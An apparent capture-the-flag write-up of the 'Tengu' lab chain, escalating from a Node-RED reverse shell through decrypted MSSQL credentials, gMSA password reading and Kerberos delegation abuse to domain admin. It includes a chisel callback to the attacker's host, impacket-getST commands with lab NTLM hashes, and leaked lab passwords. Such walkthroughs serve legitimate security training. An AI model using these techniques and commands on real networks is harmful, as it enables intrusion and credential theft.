Tengu (chain) (medium)

port scan

Open 10.10.237.119:22
Open 10.10.237.119:1880
Open 10.10.237.118:3389
Open 10.10.237.117:3389

service enumeration

abuse node-red

we can select exec node and add into Flow 1

callback !

add reverse shell script

we have a shell

add ssh key

decrypt mssql cred

i will upload chisel and nmap

./chisel client 10.8.1.167:8000 R:socks &

the 10.10.237.118 open 1433 (mssql), so the host maybe is sql.tengu.vl in node-red

the node-red must have mssql cred to finish the flow, so there must have cred. let's see

the readme.md tell use the cred stored at env

double click SQL nodes, we can use Connection, click edit

but we can't see the password

but there have a bash script to decrypt runtime cred

i will download cred json file

decrypt success! nodered_connector:DreamPuppyOverall25

now i can connect mssql server

mssql enumeration

there have two custom db Demo and Dev

and the Demo db have t2_m.winters encrypt cred

check crackstation, the password is Tengu123

and we can use Tengu123 become root

firefox ?

yes there installed firefox

fetch domain information

internal smb enumeration

download /etc/krb5.keytab and get computer hash NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49

bloodhound fetch domain information

read gmsa password

i will use a tool called bloodhound-quickwin

linux_server can read GMSA01$ password

and GMSA01$ AllowedToDelegate => SQL.TENGU.VL, SQL_ADMINS group

since we have nodered$ (linux_server) ntlm hash, we can abuse those relationship

use crackmapexec ldap to read GMSA01 gmsaPassword

GMSA01$:bd1811a45423dcdd470df09ed1621b97

abuse KCD

since the GMSA01 AllowedToDelegate sql_admins group, we can impersonate a user from sql_admins group.

zds impacket-getST -spn 'MSSQLSvc/SQL.tengu.vl:1433' -dc-ip dc.tengu.vl -impersonate 'T1_C.FOWLER' -hashes :bd1811a45423dcdd470df09ed1621b97 'tengu.vl/gmsa01'

the error which mean the account was sensitive for delegation, or a member of the "Protected Users" group.

so let's try t2_m.winters user

zds impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' -dc-ip dc.tengu.vl -impersonate 'T1_M.WINTERS' -hashes :bd1811a45423dcdd470df09ed1621b97 tengu.vl/gmsa01\$:@sql.tengu.vl

we have rce on sql server

get a beacon

abuse SeImpersonatePrivilege

since we are service account, we also have SeImpersonatePrivilege privilege.

we can use BadPotato tool get system beacon https://github.com/BeichenDream/BadPotato

domain admin

sam dump

sharpdpapi machinetriage

there have T0_c.fowler cred

domain admin ?

STATUS_ACCOUNT_RESTRICTION - Local Security Policy/Accounts: Limit local account use of blank passwords to computer.

we can try kerberos auth

krb5.conf

[libdefaults]
        default_realm = TENGU.VL
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
        rdns = false
        dns_canonicalize_hostname = false
        fcc-mit-ticketflags = true

[realms]
        TENGU.VL = {
                kdc = dc.tengu.vl
        }

[domain_realm]
        .tengu.vl = TENGU.VL

ok!

now we have domain admin shell on dc!

PreviousTea (chain) (medium)NextVigilant (chain) (hard)

Last updated 1 year ago

hashtagport scan

hashtagservice enumeration

hashtagabuse node-red

hashtagdecrypt mssql cred

hashtagmssql enumeration

hashtagfetch domain information

hashtagread gmsa password

hashtagabuse KCD

hashtagabuse SeImpersonatePrivilege

hashtagdomain admin